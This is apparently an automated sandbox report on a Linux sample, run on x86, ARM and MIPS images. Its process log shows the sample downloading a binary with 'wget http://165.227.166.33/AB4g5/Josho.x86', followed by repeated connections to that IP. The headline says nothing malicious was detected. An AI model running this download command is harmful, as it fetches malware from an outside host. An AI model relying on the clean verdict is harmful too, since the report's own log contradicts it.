Analysis Overview
SHA256
c54624df5eda3c877a1a710bf82a138c50a8dbf2adc20082b7cb30085083e0c9
Threat Level: No (potentially) malicious behavior was detected
The file b5dfa4d567dc510c11a757c9a670a218_JaffaCakes118 was found to be: No (potentially) malicious behavior was detected.
Malicious Activity Summary
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-06-17 00:01
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-17 00:01
Reported
2024-06-17 00:04
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
131s
Max time network
148s
Command Line
Signatures
Processes
/tmp/b5dfa4d567dc510c11a757c9a670a218_JaffaCakes118
[/tmp/b5dfa4d567dc510c11a757c9a670a218_JaffaCakes118]
/usr/bin/wget
[wget http://165.227.166.33/AB4g5/Josho.x86]
Network
| Country | Destination | Domain | Proto |
| DE | 165.227.166.33:80 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| GB | 89.187.167.9:443 | tcp | |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| DE | 165.227.166.33:80 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-17 00:01
Reported
2024-06-17 00:04
Platform
debian9-armhf-20240611-en
Max time network
9s
Command Line
Signatures
Processes
Network
| Country | Destination | Domain | Proto |
| DE | 165.227.166.33:80 | 165.227.166.33 | tcp |
| DE | 165.227.166.33:80 | 165.227.166.33 | tcp |
| DE | 165.227.166.33:80 | 165.227.166.33 | tcp |
| DE | 165.227.166.33:80 | 165.227.166.33 | tcp |
| DE | 165.227.166.33:80 | 165.227.166.33 | tcp |
| DE | 165.227.166.33:80 | 165.227.166.33 | tcp |
| DE | 165.227.166.33:80 | 165.227.166.33 | tcp |
| DE | 165.227.166.33:80 | 165.227.166.33 | tcp |
| DE | 165.227.166.33:80 | 165.227.166.33 | tcp |
| DE | 165.227.166.33:80 | 165.227.166.33 | tcp |
| DE | 165.227.166.33:80 | 165.227.166.33 | tcp |
| DE | 165.227.166.33:80 | 165.227.166.33 | tcp |
| DE | 165.227.166.33:80 | 165.227.166.33 | tcp |
| DE | 165.227.166.33:80 | 165.227.166.33 | tcp |
| DE | 165.227.166.33:80 | 165.227.166.33 | tcp |
| DE | 165.227.166.33:80 | 165.227.166.33 | tcp |
| DE | 165.227.166.33:80 | 165.227.166.33 | tcp |
| DE | 165.227.166.33:80 | 165.227.166.33 | tcp |
| DE | 165.227.166.33:80 | 165.227.166.33 | tcp |
| DE | 165.227.166.33:80 | 165.227.166.33 | tcp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-17 00:01
Reported
2024-06-17 00:02
Platform
debian9-mipsbe-20240611-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-17 00:01
Reported
2024-06-17 00:01
Platform
debian9-mipsel-20240611-en